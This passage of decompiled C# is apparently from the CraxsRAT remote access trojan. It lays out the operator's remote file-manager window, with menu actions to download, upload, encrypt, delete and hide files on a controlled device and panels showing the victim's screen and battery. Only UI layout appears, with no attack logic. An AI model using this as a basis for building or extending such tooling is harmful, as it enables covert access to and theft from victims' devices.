namespace Craxs_Rat
{
	// Token: 0x020000B8 RID: 184
	[global::Microsoft.VisualBasic.CompilerServices.DesignerGenerated]
	public partial class FileManager : global::System.Windows.Forms.Form
	{
		// Token: 0x06000C60 RID: 3168 RVA: 0x000812D0 File Offset: 0x0007F4D0
		protected override void Dispose(bool disposing)
		{
			try
			{
				if (disposing && this.components != null)
				{
					((global::System.IDisposable)this.components).Dispose();
				}
			}
			finally
			{
				base.Dispose(disposing);
			}
		}

		// Token: 0x06000C61 RID: 3169 RVA: 0x00081314 File Offset: 0x0007F514
		private void InitializeComponent()
		{
			this.components = new global::System.ComponentModel.Container();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle2 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle3 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle4 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle5 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle6 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle7 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle8 = new global::System.Windows.Forms.DataGridViewCellStyle();
			global::System.Windows.Forms.DataGridViewCellStyle dataGridViewCellStyle9 = new global::System.Windows.Forms.DataGridViewCellStyle();
			this.ctxMenu = new global::System.Windows.Forms.ContextMenuStrip(this.components);
			this.OpenToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.CopyToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.CutToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.PasteToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.DownloadToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.UploadToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.EncryptToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.DecodeToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.ZipToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.UnZipToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.DeleteToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.AddFilesToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.RenameToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.EditToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.HideToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.ShowToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.SetWallpaperToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.PlaySoundToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.FolderDownloadsToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.FilesUpload = new global::System.Windows.Forms.OpenFileDialog();
			this.TOpacity = new global::System.Windows.Forms.Timer(this.components);
			this.ToolTip1 = new global::System.Windows.Forms.ToolTip(this.components);
			this.ThumbsCont = new global::System.Windows.Forms.Label();
			this.Panel1 = new global::System.Windows.Forms.Panel();
			this.DGV0 = new global::DrakeUI.Framework.DrakeUIDataGridView();
			this.typ = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.nam = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.siz = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.mofdat = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.dat = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.ic = new global::System.Windows.Forms.DataGridViewImageColumn();
			this.DGVDATA = new global::System.Windows.Forms.DataGridView();
			this.N = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.P = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.S = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.D = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.ST = new global::System.Windows.Forms.DataGridViewTextBoxColumn();
			this.Panel6 = new global::System.Windows.Forms.Panel();
			this.Label1 = new global::System.Windows.Forms.Label();
			this.seentext = new global::System.Windows.Forms.Label();
			this.Selecttext = new global::System.Windows.Forms.Label();
			this.CountText = new global::System.Windows.Forms.Label();
			this.Panel3 = new global::System.Windows.Forms.Panel();
			this.thumb_chk = new global::DrakeUI.Framework.DrakeUICheckBox();
			this.ClearButton = new global::DrakeUI.Framework.DrakeUIButtonIcon();
			this.cancelbtn = new global::DrakeUI.Framework.DrakeUIButtonIcon();
			this.DrakeWidth_W4 = new global::DrakeUI.Framework.DrakeWidth_W();
			this.DrakeWidth_W3 = new global::DrakeUI.Framework.DrakeWidth_W();
			this.DrakeWidth_W2 = new global::DrakeUI.Framework.DrakeWidth_W();
			this.viwimage = new global::System.Windows.Forms.PictureBox();
			this.usrscreen = new global::System.Windows.Forms.PictureBox();
			this.Usrbtry = new global::System.Windows.Forms.PictureBox();
			this.sdbtn = new global::DrakeUI.Framework.DrakeUIButtonIcon();
			this.dcmbtn = new global::DrakeUI.Framework.DrakeUIButtonIcon();
			this.ClientPic = new global::System.Windows.Forms.PictureBox();
			this.picbtn = new global::DrakeUI.Framework.DrakeUIButtonIcon();
			this.Downpic = new global::MetroSet_UI.Controls.MetroSetBadge();
			this.Panel4 = new global::System.Windows.Forms.Panel();
			this.DrakeUIButtonIcon8 = new global::DrakeUI.Framework.DrakeUIButtonIcon();
			this.DrakeUIButtonIcon7 = new global::DrakeUI.Framework.DrakeUIButtonIcon();
			this.DrakeUIButtonIcon6 = new global::DrakeUI.Framework.DrakeUIButtonIcon();
			this.clinumb = new global::System.Windows.Forms.Label();
			this.Timer1 = new global::System.Windows.Forms.Timer(this.components);
			this.Label2 = new global::System.Windows.Forms.Label();
			this.Panel2 = new global::System.Windows.Forms.Panel();
			this.pathtxt = new global::DrakeUI.Framework.DrakeUITextBox();
			this.clearsrchbtn = new global::DrakeUI.Framework.DrakeUIAvatar();
			this.searchtext = new global::DrakeUI.Framework.DrakeUITextBox();
			this.searchbtn = new global::DrakeUI.Framework.DrakeUIAvatar();
			this.DrakeUIButtonIcon5 = new global::DrakeUI.Framework.DrakeUIButtonIcon();
			this.DrakeUIButtonIcon4 = new global::DrakeUI.Framework.DrakeUIButtonIcon();
			this.DrakeWidth_W1 = new global::DrakeUI.Framework.DrakeWidth_W();
			this.PB = new global::System.Windows.Forms.ProgressBar();
			this.DrakeUIToolTip1 = new global::DrakeUI.Framework.DrakeUIToolTip(this.components);
			this.Timer2 = new global::System.Windows.Forms.Timer(this.components);
			this.ctxMenu.SuspendLayout();
			this.Panel1.SuspendLayout();
			((global::System.ComponentModel.ISupportInitialize)this.DGV0).BeginInit();
			((global::System.ComponentModel.ISupportInitialize)this.DGVDATA).BeginInit();
			this.Panel6.SuspendLayout();
			this.Panel3.SuspendLayout();
			((global::System.ComponentModel.ISupportInitialize)this.viwimage).BeginInit();
			((global::System.ComponentModel.ISupportInitialize)this.usrscreen).BeginInit();
			((global::System.ComponentModel.ISupportInitialize)this.Usrbtry).BeginInit();
			((global::System.ComponentModel.ISupportInitialize)this.ClientPic).BeginInit();
			this.Panel4.SuspendLayout();
			this.Panel2.SuspendLayout();
			base.SuspendLayout();
			this.ctxMenu.ImageScalingSize = new global::System.Drawing.Size(20, 20);
			this.ctxMenu.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
			{
				this.OpenToolStripMenuItem,
				this.CopyToolStripMenuItem,
				this.CutToolStripMenuItem,
				this.PasteToolStripMenuItem,
				this.DownloadToolStripMenuItem,
				this.UploadToolStripMenuItem,
				this.EncryptToolStripMenuItem,
				this.DecodeToolStripMenuItem,
				this.ZipToolStripMenuItem,
				this.UnZipToolStripMenuItem,
				this.DeleteToolStripMenuItem,
				this.AddFilesToolStripMenuItem,
				this.RenameToolStripMenuItem,
				this.EditToolStripMenuItem,
				this.HideToolStripMenuItem,
				this.ShowToolStripMenuItem,
				this.SetWallpaperToolStripMenuItem,
				this.PlaySoundToolStripMenuItem,
				this.FolderDownloadsToolStripMenuItem
			});
			this.ctxMenu.Name = "ctxMenu";
			this.ctxMenu.Size = new global::System.Drawing.Size(170, 460);
			this.OpenToolStripMenuItem.Name = "OpenToolStripMenuItem";
			this.OpenToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.OpenToolStripMenuItem.Text = "Open";
			this.CopyToolStripMenuItem.Name = "CopyToolStripMenuItem";
			this.CopyToolStripMenuItem.ShortcutKeys = (global::System.Windows.Forms.Keys)131139;
			this.CopyToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.CopyToolStripMenuItem.Text = "Copy";
			this.CutToolStripMenuItem.Name = "CutToolStripMenuItem";
			this.CutToolStripMenuItem.ShortcutKeys = (global::System.Windows.Forms.Keys)131160;
			this.CutToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.CutToolStripMenuItem.Text = "Cut";
			this.PasteToolStripMenuItem.Name = "PasteToolStripMenuItem";
			this.PasteToolStripMenuItem.ShortcutKeys = (global::System.Windows.Forms.Keys)131158;
			this.PasteToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.PasteToolStripMenuItem.Text = "Paste";
			this.DownloadToolStripMenuItem.Name = "DownloadToolStripMenuItem";
			this.DownloadToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.DownloadToolStripMenuItem.Text = "Download";
			this.UploadToolStripMenuItem.Name = "UploadToolStripMenuItem";
			this.UploadToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.UploadToolStripMenuItem.Text = "Upload";
			this.EncryptToolStripMenuItem.Name = "EncryptToolStripMenuItem";
			this.EncryptToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.EncryptToolStripMenuItem.Text = "Encrypt";
			this.DecodeToolStripMenuItem.Name = "DecodeToolStripMenuItem";
			this.DecodeToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.DecodeToolStripMenuItem.Text = "Decode";
			this.ZipToolStripMenuItem.Name = "ZipToolStripMenuItem";
			this.ZipToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.ZipToolStripMenuItem.Text = "Zip";
			this.UnZipToolStripMenuItem.Name = "UnZipToolStripMenuItem";
			this.UnZipToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.UnZipToolStripMenuItem.Text = "UnZip";
			this.DeleteToolStripMenuItem.Name = "DeleteToolStripMenuItem";
			this.DeleteToolStripMenuItem.ShortcutKeys = global::System.Windows.Forms.Keys.Delete;
			this.DeleteToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.DeleteToolStripMenuItem.Text = "Delete";
			this.AddFilesToolStripMenuItem.Name = "AddFilesToolStripMenuItem";
			this.AddFilesToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.AddFilesToolStripMenuItem.Text = "Add Files";
			this.RenameToolStripMenuItem.Name = "RenameToolStripMenuItem";
			this.RenameToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.RenameToolStripMenuItem.Text = "Rename";
			this.EditToolStripMenuItem.Name = "EditToolStripMenuItem";
			this.EditToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.EditToolStripMenuItem.Text = "Edit";
			this.HideToolStripMenuItem.Name = "HideToolStripMenuItem";
			this.HideToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.HideToolStripMenuItem.Text = "Hidden";
			this.ShowToolStripMenuItem.Name = "ShowToolStripMenuItem";
			this.ShowToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.ShowToolStripMenuItem.Text = "UnHidden";
			this.SetWallpaperToolStripMenuItem.Name = "SetWallpaperToolStripMenuItem";
			this.SetWallpaperToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.SetWallpaperToolStripMenuItem.Text = "Set wallpaper";
			this.PlaySoundToolStripMenuItem.Name = "PlaySoundToolStripMenuItem";
			this.PlaySoundToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.PlaySoundToolStripMenuItem.Text = "Play sound";
			this.FolderDownloadsToolStripMenuItem.Name = "FolderDownloadsToolStripMenuItem";
			this.FolderDownloadsToolStripMenuItem.Size = new global::System.Drawing.Size(169, 24);
			this.FolderDownloadsToolStripMenuItem.Text = "Downloads";
			this.FilesUpload.FileName = "OpenFileDialog1";
			this.TOpacity.Interval = 1;
			this.ToolTip1.AutoPopDelay = 5000;
			this.ToolTip1.BackColor = global::System.Drawing.Color.FromArgb(35, 35, 35);
			this.ToolTip1.ForeColor = global::System.Drawing.Color.DarkTurquoise;
			this.ToolTip1.InitialDelay = 100;
			this.ToolTip1.ReshowDelay = 1000;
			this.ThumbsCont.AutoSize = true;
			this.ThumbsCont.BackColor = global::System.Drawing.Color.Transparent;
			this.ThumbsCont.Font = new global::System.Drawing.Font("Segoe UI", 9f);
			this.ThumbsCont.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.ThumbsCont.Location = new global::System.Drawing.Point(68, 188);
			this.ThumbsCont.Name = "ThumbsCont";
			this.ThumbsCont.Size = new global::System.Drawing.Size(89, 20);
			this.ThumbsCont.TabIndex = 8;
			this.ThumbsCont.Text = "Use Thumbs";
			this.DrakeUIToolTip1.SetToolTip(this.ThumbsCont, "Use Cashed Images for preview");
			this.Panel1.BackColor = global::System.Drawing.Color.FromArgb(237, 237, 235);
			this.Panel1.Controls.Add(this.DGV0);
			this.Panel1.Controls.Add(this.DGVDATA);
			this.Panel1.Controls.Add(this.Panel6);
			this.Panel1.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.Panel1.Location = new global::System.Drawing.Point(179, 51);
			this.Panel1.Margin = new global::System.Windows.Forms.Padding(3, 4, 3, 4);
			this.Panel1.Name = "Panel1";
			this.Panel1.Size = new global::System.Drawing.Size(837, 799);
			this.Panel1.TabIndex = 0;
			this.DGV0.AllowUserToAddRows = false;
			this.DGV0.AllowUserToDeleteRows = false;
			dataGridViewCellStyle.BackColor = global::System.Drawing.Color.Black;
			this.DGV0.AlternatingRowsDefaultCellStyle = dataGridViewCellStyle;
			this.DGV0.AutoSizeColumnsMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnsMode.Fill;
			this.DGV0.AutoSizeRowsMode = global::System.Windows.Forms.DataGridViewAutoSizeRowsMode.AllCells;
			this.DGV0.BackgroundColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.DGV0.CellBorderStyle = global::System.Windows.Forms.DataGridViewCellBorderStyle.None;
			this.DGV0.ColumnHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.Single;
			dataGridViewCellStyle2.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleCenter;
			dataGridViewCellStyle2.BackColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			dataGridViewCellStyle2.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			dataGridViewCellStyle2.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle2.SelectionBackColor = global::System.Drawing.SystemColors.Highlight;
			dataGridViewCellStyle2.SelectionForeColor = global::System.Drawing.SystemColors.HighlightText;
			dataGridViewCellStyle2.WrapMode = global::System.Windows.Forms.DataGridViewTriState.True;
			this.DGV0.ColumnHeadersDefaultCellStyle = dataGridViewCellStyle2;
			this.DGV0.ColumnHeadersHeight = 32;
			this.DGV0.ColumnHeadersHeightSizeMode = global::System.Windows.Forms.DataGridViewColumnHeadersHeightSizeMode.DisableResizing;
			this.DGV0.Columns.AddRange(new global::System.Windows.Forms.DataGridViewColumn[]
			{
				this.typ,
				this.nam,
				this.siz,
				this.mofdat,
				this.dat,
				this.ic
			});
			this.DGV0.ContextMenuStrip = this.ctxMenu;
			dataGridViewCellStyle3.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle3.BackColor = global::System.Drawing.Color.FromArgb(45, 45, 45);
			dataGridViewCellStyle3.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			dataGridViewCellStyle3.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle3.SelectionBackColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle3.SelectionForeColor = global::System.Drawing.Color.FromArgb(48, 48, 48);
			dataGridViewCellStyle3.WrapMode = global::System.Windows.Forms.DataGridViewTriState.False;
			this.DGV0.DefaultCellStyle = dataGridViewCellStyle3;
			this.DGV0.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.DGV0.EnableHeadersVisualStyles = false;
			this.DGV0.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.DGV0.GridColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DGV0.Location = new global::System.Drawing.Point(0, 0);
			this.DGV0.Name = "DGV0";
			this.DGV0.ReadOnly = true;
			this.DGV0.RectColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DGV0.RowHeadersVisible = false;
			dataGridViewCellStyle4.BackColor = global::System.Drawing.Color.Black;
			this.DGV0.RowsDefaultCellStyle = dataGridViewCellStyle4;
			this.DGV0.RowTemplate.Height = 29;
			this.DGV0.SelectedIndex = -1;
			this.DGV0.SelectionMode = global::System.Windows.Forms.DataGridViewSelectionMode.FullRowSelect;
			this.DGV0.Size = new global::System.Drawing.Size(837, 774);
			this.DGV0.StripeEvenColor = global::System.Drawing.Color.Black;
			this.DGV0.StripeOddColor = global::System.Drawing.Color.Black;
			this.DGV0.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.DGV0.StyleCustomMode = true;
			this.DGV0.TabIndex = 14;
			this.typ.FillWeight = 50f;
			this.typ.HeaderText = "Type";
			this.typ.Name = "typ";
			this.typ.ReadOnly = true;
			this.nam.FillWeight = 70f;
			this.nam.HeaderText = "Name";
			this.nam.Name = "nam";
			this.nam.ReadOnly = true;
			this.siz.FillWeight = 45f;
			this.siz.HeaderText = "Size";
			this.siz.Name = "siz";
			this.siz.ReadOnly = true;
			this.mofdat.FillWeight = 60f;
			this.mofdat.HeaderText = "Modified-Date";
			this.mofdat.Name = "mofdat";
			this.mofdat.ReadOnly = true;
			this.dat.FillWeight = 50f;
			this.dat.HeaderText = "Date";
			this.dat.Name = "dat";
			this.dat.ReadOnly = true;
			this.ic.FillWeight = 45f;
			this.ic.HeaderText = "";
			this.ic.Name = "ic";
			this.ic.ReadOnly = true;
			this.DGVDATA.AllowUserToAddRows = false;
			this.DGVDATA.AllowUserToDeleteRows = false;
			this.DGVDATA.AllowUserToResizeColumns = false;
			this.DGVDATA.AllowUserToResizeRows = false;
			dataGridViewCellStyle5.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle5.BackColor = global::System.Drawing.Color.FromArgb(35, 35, 35);
			dataGridViewCellStyle5.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle5.SelectionBackColor = global::System.Drawing.Color.FromArgb(35, 35, 35);
			dataGridViewCellStyle5.SelectionForeColor = global::System.Drawing.Color.White;
			this.DGVDATA.AlternatingRowsDefaultCellStyle = dataGridViewCellStyle5;
			this.DGVDATA.AutoSizeColumnsMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnsMode.Fill;
			this.DGVDATA.AutoSizeRowsMode = global::System.Windows.Forms.DataGridViewAutoSizeRowsMode.AllCells;
			this.DGVDATA.BackgroundColor = global::System.Drawing.Color.FromArgb(35, 35, 35);
			this.DGVDATA.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
			this.DGVDATA.CellBorderStyle = global::System.Windows.Forms.DataGridViewCellBorderStyle.None;
			this.DGVDATA.ClipboardCopyMode = global::System.Windows.Forms.DataGridViewClipboardCopyMode.EnableWithoutHeaderText;
			this.DGVDATA.ColumnHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.None;
			dataGridViewCellStyle6.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle6.BackColor = global::System.Drawing.Color.FromArgb(35, 35, 35);
			dataGridViewCellStyle6.Font = new global::System.Drawing.Font("Segoe UI", 8.25f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle6.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle6.SelectionBackColor = global::System.Drawing.Color.FromArgb(35, 35, 35);
			dataGridViewCellStyle6.SelectionForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle6.WrapMode = global::System.Windows.Forms.DataGridViewTriState.True;
			this.DGVDATA.ColumnHeadersDefaultCellStyle = dataGridViewCellStyle6;
			this.DGVDATA.ColumnHeadersHeightSizeMode = global::System.Windows.Forms.DataGridViewColumnHeadersHeightSizeMode.AutoSize;
			this.DGVDATA.Columns.AddRange(new global::System.Windows.Forms.DataGridViewColumn[]
			{
				this.N,
				this.P,
				this.S,
				this.D,
				this.ST
			});
			this.DGVDATA.ContextMenuStrip = this.ctxMenu;
			dataGridViewCellStyle7.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle7.BackColor = global::System.Drawing.Color.FromArgb(35, 35, 35);
			dataGridViewCellStyle7.Font = new global::System.Drawing.Font("Segoe UI", 8.25f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle7.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle7.SelectionBackColor = global::System.Drawing.Color.FromArgb(35, 35, 35);
			dataGridViewCellStyle7.SelectionForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle7.WrapMode = global::System.Windows.Forms.DataGridViewTriState.False;
			this.DGVDATA.DefaultCellStyle = dataGridViewCellStyle7;
			this.DGVDATA.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.DGVDATA.EditMode = global::System.Windows.Forms.DataGridViewEditMode.EditProgrammatically;
			this.DGVDATA.EnableHeadersVisualStyles = false;
			this.DGVDATA.GridColor = global::System.Drawing.Color.White;
			this.DGVDATA.Location = new global::System.Drawing.Point(0, 0);
			this.DGVDATA.Margin = new global::System.Windows.Forms.Padding(3, 4, 3, 4);
			this.DGVDATA.Name = "DGVDATA";
			this.DGVDATA.RowHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.Single;
			dataGridViewCellStyle8.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle8.BackColor = global::System.Drawing.Color.FromArgb(35, 35, 35);
			dataGridViewCellStyle8.Font = new global::System.Drawing.Font("Segoe UI", 8.25f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle8.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle8.SelectionBackColor = global::System.Drawing.Color.FromArgb(35, 35, 35);
			dataGridViewCellStyle8.SelectionForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle8.WrapMode = global::System.Windows.Forms.DataGridViewTriState.True;
			this.DGVDATA.RowHeadersDefaultCellStyle = dataGridViewCellStyle8;
			this.DGVDATA.RowHeadersVisible = false;
			dataGridViewCellStyle9.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle9.BackColor = global::System.Drawing.Color.FromArgb(35, 35, 35);
			dataGridViewCellStyle9.Font = new global::System.Drawing.Font("Roboto Slab", 10f);
			dataGridViewCellStyle9.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle9.SelectionBackColor = global::System.Drawing.Color.FromArgb(35, 35, 35);
			dataGridViewCellStyle9.SelectionForeColor = global::System.Drawing.Color.White;
			this.DGVDATA.RowsDefaultCellStyle = dataGridViewCellStyle9;
			this.DGVDATA.SelectionMode = global::System.Windows.Forms.DataGridViewSelectionMode.FullRowSelect;
			this.DGVDATA.Size = new global::System.Drawing.Size(837, 774);
			this.DGVDATA.TabIndex = 7;
			this.N.HeaderText = "Name";
			this.N.Name = "N";
			this.P.HeaderText = "Path";
			this.P.Name = "P";
			this.S.HeaderText = "Size";
			this.S.Name = "S";
			this.D.HeaderText = "Downloaded";
			this.D.Name = "D";
			this.ST.HeaderText = "Status";
			this.ST.Name = "ST";
			this.Panel6.BackColor = global::System.Drawing.Color.Black;
			this.Panel6.Controls.Add(this.Label1);
			this.Panel6.Controls.Add(this.seentext);
			this.Panel6.Controls.Add(this.Selecttext);
			this.Panel6.Controls.Add(this.CountText);
			this.Panel6.Dock = global::System.Windows.Forms.DockStyle.Bottom;
			this.Panel6.Location = new global::System.Drawing.Point(0, 774);
			this.Panel6.Name = "Panel6";
			this.Panel6.Size = new global::System.Drawing.Size(837, 25);
			this.Panel6.TabIndex = 10;
			this.Label1.Dock = global::System.Windows.Forms.DockStyle.Right;
			this.Label1.FlatStyle = global::System.Windows.Forms.FlatStyle.System;
			this.Label1.Font = new global::System.Drawing.Font("Segoe UI", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label1.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.Label1.Location = new global::System.Drawing.Point(693, 0);
			this.Label1.Name = "Label1";
			this.Label1.Size = new global::System.Drawing.Size(144, 25);
			this.Label1.TabIndex = 3;
			this.Label1.Text = "...";
			this.Label1.TextAlign = global::System.Drawing.ContentAlignment.MiddleLeft;
			this.seentext.Dock = global::System.Windows.Forms.DockStyle.Left;
			this.seentext.FlatStyle = global::System.Windows.Forms.FlatStyle.System;
			this.seentext.Font = new global::System.Drawing.Font("Segoe UI", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.seentext.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.seentext.Location = new global::System.Drawing.Point(321, 0);
			this.seentext.Name = "seentext";
			this.seentext.Size = new global::System.Drawing.Size(155, 25);
			this.seentext.TabIndex = 2;
			this.seentext.Text = "Seen";
			this.Selecttext.Dock = global::System.Windows.Forms.DockStyle.Left;
			this.Selecttext.FlatStyle = global::System.Windows.Forms.FlatStyle.System;
			this.Selecttext.Font = new global::System.Drawing.Font("Segoe UI", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Selecttext.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.Selecttext.Location = new global::System.Drawing.Point(141, 0);
			this.Selecttext.Name = "Selecttext";
			this.Selecttext.Size = new global::System.Drawing.Size(180, 25);
			this.Selecttext.TabIndex = 1;
			this.Selecttext.Text = "Selected";
			this.CountText.Dock = global::System.Windows.Forms.DockStyle.Left;
			this.CountText.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
			this.CountText.Font = new global::System.Drawing.Font("Segoe UI", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.CountText.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.CountText.Location = new global::System.Drawing.Point(0, 0);
			this.CountText.Name = "CountText";
			this.CountText.Size = new global::System.Drawing.Size(141, 25);
			this.CountText.TabIndex = 0;
			this.CountText.Text = "All";
			this.Panel3.BackColor = global::System.Drawing.Color.Black;
			this.Panel3.Controls.Add(this.thumb_chk);
			this.Panel3.Controls.Add(this.ClearButton);
			this.Panel3.Controls.Add(this.cancelbtn);
			this.Panel3.Controls.Add(this.DrakeWidth_W4);
			this.Panel3.Controls.Add(this.DrakeWidth_W3);
			this.Panel3.Controls.Add(this.DrakeWidth_W2);
			this.Panel3.Controls.Add(this.viwimage);
			this.Panel3.Controls.Add(this.usrscreen);
			this.Panel3.Controls.Add(this.Usrbtry);
			this.Panel3.Controls.Add(this.sdbtn);
			this.Panel3.Controls.Add(this.dcmbtn);
			this.Panel3.Controls.Add(this.ClientPic);
			this.Panel3.Controls.Add(this.picbtn);
			this.Panel3.Controls.Add(this.Downpic);
			this.Panel3.Controls.Add(this.Panel4);
			this.Panel3.Controls.Add(this.ThumbsCont);
			this.Panel3.Dock = global::System.Windows.Forms.DockStyle.Left;
			this.Panel3.Location = new global::System.Drawing.Point(0, 0);
			this.Panel3.Name = "Panel3";
			this.Panel3.Size = new global::System.Drawing.Size(179, 850);
			this.Panel3.TabIndex = 20;
			this.thumb_chk.CheckBoxColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.thumb_chk.Checked = true;
			this.thumb_chk.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.thumb_chk.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.thumb_chk.Location = new global::System.Drawing.Point(16, 186);
			this.thumb_chk.Name = "thumb_chk";
			this.thumb_chk.Padding = new global::System.Windows.Forms.Padding(22, 0, 0, 0);
			this.thumb_chk.Size = new global::System.Drawing.Size(53, 29);
			this.thumb_chk.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.thumb_chk.StyleCustomMode = true;
			this.thumb_chk.TabIndex = 35;
